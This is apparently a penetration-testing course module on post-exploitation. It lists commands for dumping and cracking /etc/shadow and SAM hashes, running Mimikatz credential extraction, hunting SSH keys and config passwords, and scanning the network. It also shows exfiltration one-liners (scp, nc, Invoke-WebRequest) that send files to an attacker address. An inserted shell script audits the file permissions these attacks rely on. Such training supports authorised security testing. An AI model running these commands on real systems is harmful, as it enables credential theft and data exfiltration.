Module 5: Post-Exploitation & Privilege Escalation

Post-Exploitation & Credential Harvesting


After gaining elevated access, you need to extract credentials and sensitive data. This lesson covers essential post-exploitation techniques.

Information Gathering

System Information

Linux:

# Users and groups
cat /etc/passwd
cat /etc/group
cat /etc/shadow  # If readable

# Network configuration
ip a
netstat -tulnp
cat /etc/hosts

# Running processes
ps auxww

# Installed packages
dpkg -l  # Debian
rpm -qa  # RHEL

Windows:

# System info
systeminfo
hostname

# Users
net user
net localgroup administrators

# Network
ipconfig /all
netstat -ano
route print
arp -a

# Processes
tasklist /v
wmic process list brief

Credential Harvesting

Linux Credentials

Password Files:

# Check /etc/shadow permissions
ls -la /etc/shadow

# If readable, crack hashes
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt

SSH Keys:

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Common locations
cat /home/*/.ssh/id_rsa
cat /root/.ssh/id_rsa

History Files:

cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history

Configuration Files:

# Web configs
find /var/www -name "*.php" -exec grep -l "password" {} \;
find /var/www -name "*.conf" -exec grep -l "password" {} \;

# Database configs
cat /var/www/html/wp-config.php
cat /etc/mysql/my.cnf
cat ~/.my.cnf
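Added defender-side example (not code from the lesson): a POSIX shell audit that reports the on-disk conditions the Linux credential-harvesting commands above depend on: a world-readable /etc/shadow, SSH private keys readable by group or other, world-readable shell/database history files, and world-readable web configs that mention "password". The function name audit_linux_creds and its ROOT prefix argument are this example's own assumptions; pass an empty ROOT to audit a live host.

```shell
# Added defender-side audit (not part of the lesson): reports the on-disk
# conditions that the Linux credential-harvesting commands above rely on.
# Usage: audit_linux_creds ROOT
#   ROOT is a filesystem prefix: "" audits the live host, a constructed
#   directory tree lets you test it offline. One "FINDING:" line per issue.
audit_linux_creds() {
    root="$1"

    # 1. /etc/shadow readable by "other" (group read by the shadow group is
    #    normal on Debian); this is what makes unshadow + john possible.
    find "$root/etc/shadow" -perm -004 2>/dev/null \
        | sed 's/^/FINDING: world-readable shadow file: /'

    # 2. SSH private keys readable by group or other; the find commands above
    #    locate exactly these files, and ssh itself refuses to load such a key.
    find "$root/home" "$root/root" -type f \
        \( -name id_rsa -o -name id_dsa -o -name id_ecdsa -o -name id_ed25519 \) \
        \( -perm -004 -o -perm -040 \) 2>/dev/null \
        | sed 's/^/FINDING: private key readable by group\/other: /'

    # 3. Shell and database history files readable by everyone (passwords
    #    typed on the command line, e.g. mysql -pSECRET, end up here).
    find "$root/home" "$root/root" -maxdepth 2 -type f \
        -name '.*_history' -perm -004 2>/dev/null \
        | sed 's/^/FINDING: world-readable history file: /'

    # 4. World-readable web/config files that mention "password"; the grep -l
    #    sweep in the lesson finds these from any local account.
    find "$root/var/www" -type f \( -name '*.php' -o -name '*.conf' \) \
        -perm -004 -exec grep -li password {} \; 2>/dev/null \
        | sed 's/^/FINDING: world-readable config mentions password: /'
}

# On a live host: audit_linux_creds ""   (run as root to see every home dir)
```

Every check is a permission-bit test, so the fix for each finding is the matching chmod (0640 root:shadow for /etc/shadow, 0600 for keys and history files) plus moving secrets out of the web root.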

Windows Credentials

SAM Database:

# From elevated prompt
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
reg save hklm\security C:\temp\security

# Extract with secretsdump
impacket-secretsdump -sam sam -system system -security security LOCAL

Mimikatz:

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::lsa /patch

Cached Credentials:

# Check for stored credentials
cmdkey /list

# Credential Manager
vaultcmd /listcreds:"Windows Credentials"

Registry Autologon:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultUserName, DefaultPassword

Unattend Files:

# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

Sensitive File Locations

Linux

# Credentials
/etc/passwd
/etc/shadow
/etc/group
/etc/sudoers
~/.ssh/id_rsa
~/.ssh/authorized_keys
~/.bash_history

# Web
/var/www/html/wp-config.php
/var/www/html/config.php
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf

# Database
/var/lib/mysql/
/etc/mysql/my.cnf
~/.mysql_history

Windows

# Credentials
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM

# User data
C:\Users\<user>\AppData\Local\
C:\Users\<user>\Desktop\
C:\Users\<user>\Documents\

# Web configs
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf

# Passwords in files
*.txt, *.doc, *.xls, *.config, *.ini

Network Reconnaissance

Identifying Additional Targets

Linux:

# ARP cache
arp -a
cat /proc/net/arp

# Hosts file
cat /etc/hosts

# Network connections
netstat -tulnp
ss -tulnp

# Subnet scanning
for i in $(seq 1 254); do ping -c 1 192.168.1.$i | grep "64 bytes" & done; wait

Windows:

# ARP cache
arp -a

# Hosts file
type C:\Windows\System32\drivers\etc\hosts

# Network connections
netstat -ano

# Domain computers
net view
net view /domain

Finding Shares

Linux (for Windows targets):

# SMB shares
smbclient -L //target -N
crackmapexec smb target --shares

# NFS shares
showmount -e target

Windows:

# Local shares
net share

# Remote shares
net view \\target

Data Exfiltration

Secure Transfer Methods

Linux:

# SCP
scp sensitive_data.txt attacker@10.10.14.5:/tmp/

# Netcat (sends the file in cleartext; run it through an encrypted tunnel)
nc -w 3 10.10.14.5 4444 < sensitive_data.txt

# Base64 encode and copy
base64 -w 0 sensitive_file

Windows:

# PowerShell HTTP POST to attacker (cleartext over http://; -Raw sends the file as one body)
Invoke-WebRequest -Uri "http://10.10.14.5/" -Method POST -Body (Get-Content C:\file.txt -Raw)

# Certutil
certutil -encode sensitive.txt encoded.b64
type encoded.b64

Post-Exploitation Checklist

□ Dump password hashes (SAM, /etc/shadow)
□ Extract cached credentials
□ Find SSH keys
□ Search for passwords in files
□ Check browser stored passwords
□ Enumerate network (ARP, hosts)
□ Find sensitive documents
□ Check for accessible shares
□ Document everything for report

Next, we'll cover pivoting and tunneling to reach additional network segments.
